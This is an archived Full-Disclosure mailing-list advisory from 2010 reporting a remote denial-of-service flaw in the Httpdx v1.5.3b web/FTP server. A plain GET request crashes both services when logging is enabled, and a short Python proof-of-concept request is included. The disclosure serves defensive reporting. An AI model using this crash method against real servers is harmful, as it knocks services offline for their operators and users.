[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Vulnerability Httpdx v1.5.3b

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Vulnerability Httpdx v1.5.3b
From: Mehdi Mahdjoub - Sysdream IT Security Services <m.mahdjoub@xxxxxxxxxxxx>
Date: Fri, 19 Mar 2010 15:48:21 +0100

Program          : Httpdx v1.5.3b
PoC              : Remote Crash Service (if http.log=1)
Homepage         : http://sourceforge.net/projects/httpdx/
Found by         : Jonathan Salwan
This Advisory    : Jonathan Salwan
Contact          : j.salwan@xxxxxxxxxxxx

//----- Application description
 
Single-process HTTP1.1/FTP server; no threads or processes started per
connection, runs with only few threads. Includes directory listing,
virtual hosting, basic auth., support for PHP, Perl, Python, SSI, etc.
All settings in one config/script file. 
 
 
//----- Description of vulnerability
 
The vulnerability is caused due to set http.log=1 in httpdx.conf - Error
Writting log
This can be exploited to crash all services http & ftp.
 
Use simple GET request for crash service.

 
//----- Credits
 
http://www.sysdream.com/article.php?story_id=325&section_id=78
http://www.shell-storm.org
 
 

import urllib
import urllib2

url = 'http://172.16.240.128/'

req = urllib2.Request(url)
answer = urllib2.urlopen(req)
page = answer.read()

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] CA20100318-01: Security Notice for CA ARCserve Backup
Next by Date: Re: [Full-disclosure] Fingerprinting Paper with Laser
Previous by thread: [Full-disclosure] CA20100318-01: Security Notice for CA ARCserve Backup
Next by thread: [Full-disclosure] [ MDVSA-2010:062 ] curl
Index(es):
- Date
- Thread